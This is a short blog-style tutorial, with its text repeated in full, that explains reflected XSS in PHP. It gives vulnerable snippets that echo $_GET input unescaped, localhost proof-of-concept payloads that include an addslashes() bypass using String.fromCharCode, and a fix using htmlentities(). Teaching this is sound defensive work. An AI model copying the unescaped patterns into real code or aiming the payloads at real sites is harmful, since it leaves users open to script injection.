You can use alot of vectors,can try alot of bypass methods,you can find them around the web.
Basic example
- Code snippet from test.php
---------------------------------
<?php
$name=$_GET['name'];
print $name;
?>
---------------------------------
The input is not filtered,an attacker can inject Javascript code.Example :
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
A popup with XSS message will be displayed.Javascript code succesfully executed.
Another example
- Code snippet from test.php
-------------------------------------------
<?php
$name=addslashes($_GET['name']);
print '<table name="'.$name.'"></table>';
?>
-------------------------------------------
Not an advanced example,only a bit complicated.
http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83)) </script>
Why this vector?We put " because we must close the " from the "name" atribut
of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.
Simple example
- Code snippet from modules.php
---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------
The "name" variable is injectable,input is not filtered,so we can inject
with ease Javascript code.Example :
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
How to fix?
Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.
This post originally from -- J|nX
Basic example
- Code snippet from test.php
---------------------------------
<?php
$name=$_GET['name'];
print $name;
?>
---------------------------------
The input is not filtered,an attacker can inject Javascript code.Example :
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
A popup with XSS message will be displayed.Javascript code succesfully executed.
Another example
- Code snippet from test.php
-------------------------------------------
<?php
$name=addslashes($_GET['name']);
print '<table name="'.$name.'"></table>';
?>
-------------------------------------------
Not an advanced example,only a bit complicated.
http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83)) </script>
Why this vector?We put " because we must close the " from the "name" atribut
of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.
Simple example
- Code snippet from modules.php
---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------
The "name" variable is injectable,input is not filtered,so we can inject
with ease Javascript code.Example :
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
How to fix?
Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.
This post originally from -- J|nX
0 comments:
Post a Comment